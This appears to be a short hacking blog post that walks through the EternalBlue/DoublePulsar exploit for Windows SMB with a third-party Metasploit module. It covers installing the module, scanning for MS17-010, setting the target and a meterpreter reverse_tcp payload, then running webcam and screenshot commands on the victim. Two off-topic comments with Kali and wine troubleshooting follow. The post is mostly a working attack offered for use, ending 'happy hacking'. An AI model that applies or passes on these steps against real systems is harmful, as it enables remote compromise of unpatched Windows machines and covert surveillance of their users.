Eternalblue and Doublepulsar with Metasploit

Just wanna share it..

I'm using this msf module https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.

Clone it and copy paste eternalblue_doublepulsar.rb to /usr/share/metasploit-framework/modules/exploits/windows/smb/.

Run msfconsole and scan your local network with auxiliary/scanner/smb/smb_ms17_010 (MS17-010 SMB RCE Detection).

Now use the exploit exploit/windows/smb/eternalblue_doublepulsar.
Set the necessary options like RHOST, TARGETARCHITECTURE, TARGET and PROCESSINJECT.
For DOUBLEPULSARPATH and ETERNALBLUEPATH, use Eternalblue-Doublepulsar-Metasploit/deps/ directory. For example /root/Eternalblue-Doublepulsar-Metasploit/deps/.
Don't forget set the PAYLOAD windows/x64/meterpreter/reverse_tcp (my target use x64 so i'm using x64 payload too).

If everything sets, now run exploit.

Run some interesting command like webcam_list or webcam_snap

The victim desktop screenshot.

Tested on my local network, tool used Metasploit running in Kali Linux.
Thats it, happy hacking!

Comments

ark beacon ids said…

Hello, i did "dpkg --add-architecture i386 && apt-get update && apt-get install wine32" and stuck in boot loop after reboot (enter root, password, press login, but it went back to login screen), i am running kali 2016.2, what can i do ?

January 2, 2018 at 9:32 PM

eu4 console commands said…

i got this error in metasploit? what im i doing wrong ? i moved the filles to the directory as shown in the video.
sh: 1: cd: can't cd to /root/Eternalblue-Doublepulsar-Metasploit/deps/
wine: cannot find L"C:\\windows\\system32\\Eternalblue-2.2.0.exe"

January 6, 2018 at 2:08 AM